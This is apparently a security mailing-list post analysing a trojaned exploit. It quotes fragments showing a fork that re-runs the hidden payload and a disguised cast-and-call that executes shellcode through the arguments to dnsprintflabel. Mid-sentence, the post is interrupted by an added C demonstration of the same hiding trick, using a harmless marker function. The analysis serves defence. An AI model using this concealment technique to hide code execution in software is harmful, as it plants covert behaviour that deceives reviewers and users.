Below I have excerpted the obvious pieces of the trojan.  The functions
which do the deed are set_ptr, and the call to dnsprintflabel.

I just thought some people may have wanted to know how the person who
wrote the trojan hid the shellcode among the seemingly correct exploit.


*** set_ptr does the fork dance.

set_ptr(char *buff, int offset, unsigned long val, int s)

                if (!fork())

*** After the above fork, child does meaningless memcpy and
*** returns to main, causing multiple executions of the trojan
*** shellcode.

        memcpy(buff, copy_buff, sizeof(copy_buff));
        return 0;

*** dnsprintflabel has a lot of crap code in it, but it
*** isn't this function that does the deed, it's the
*** arguments to the function.

/* pull out a compressed query name */
char           *
dnsprintflabel(char *s, char *buf, char *p)
        return (p);

*** This is the actual code that does the running of the shellcode.
*** In it he hides a lot of useless casts to hide the inline prototype
*** of the call to the shellcode.

         * encode packet ...
        dnsprintflabel(remote_addr, (char *) (expl_buffer + sizeof(HEADER)),
                 (char *) ((unsigned long) &expl_buffer[0] + sizeof(HEADER) + 1));

This is the carefully typecast prototype for the shellcode: he just
skips all the header and pointer crap to actually run the shellcode.
The &expl_buffer[0] + sizeof(HEADER) + 1 is actually just the shellcode
he copied from the buffers above, hidden behind some custom types and
stuff.

EXPLANATION: The & operator just returns the pointer to the array
element at the calculated offset (sizeof(HEADER) + 1).  The thing that
gives this away as a function call is the extra set of parentheses
after the typecast; this is the lexicon for an inline function
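To make the reading rule above concrete, here is an added example (not code from the trojan or from this post) that puts the two forms side by side: a cast of a computed address passed as an argument, and the same cast to a function-pointer type followed by the extra "()". The decoy() function, the marker() function standing in for "the bytes at that address", and the hidden_calls counter are all constructed for this illustration; the only thing the example shares with the post is the shape of the argument expression.

```c
#include <stddef.h>
#include <stdint.h>

/* Counter so a caller can prove whether the hidden call actually ran. */
static int hidden_calls = 0;

/* Harmless stand-in for "whatever sits at the computed address": a real C
   function.  In the post that role is played by the bytes copied into
   expl_buffer; here it is just a function that bumps a counter. */
static char *marker(void)
{
    hidden_calls++;
    return "ran";
}

/* Decoy with the same shape as dnsprintflabel(char *s, char *buf, char *p):
   it does nothing interesting with its third argument (constructed). */
static char *decoy(char *s, char *buf, char *p)
{
    (void)s;
    (void)buf;
    return p;
}

/* Form 1: the third argument is a plain cast of a computed address.
   The result is a pointer value; nothing at that address executes. */
int argument_is_plain_cast(void)
{
    char packet[16] = {0};
    uintptr_t base = (uintptr_t)(void *)marker;   /* "address of the buffer" */
    hidden_calls = 0;
    decoy(packet, packet + 1, (char *)(base + 0));
    return hidden_calls;   /* 0: decoy() received a pointer, nothing ran */
}

/* Form 2: the same computed address, but cast to a function-pointer type
   and followed by an extra "()".  The argument expression is now a call,
   and it executes while the arguments are evaluated, before decoy() is
   even entered.  The extra parentheses are the tell. */
int argument_is_cast_and_call(void)
{
    char packet[16] = {0};
    uintptr_t base = (uintptr_t)(void *)marker;
    hidden_calls = 0;
    decoy(packet, packet + 1, ((char *(*)(void))(base + 0))());
    return hidden_calls;   /* 1: marker() ran during argument evaluation */
}

int main(void)
{
    /* Expected: 0 then 1 */
    return (argument_is_plain_cast() == 0 && argument_is_cast_and_call() == 1) ? 0 : 1;
}
```

When auditing third-party exploit code, the check is mechanical: for every cast inside an argument list, look for a function-pointer type in the cast and a trailing "()" after the closing parenthesis. A cast alone yields a value; a cast plus "()" transfers control, regardless of what the surrounding function is named.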

Perry Harrington                 Director of                   zelur xuniL  ()
[EMAIL PROTECTED]             System Architecture               Think Blue.  /\
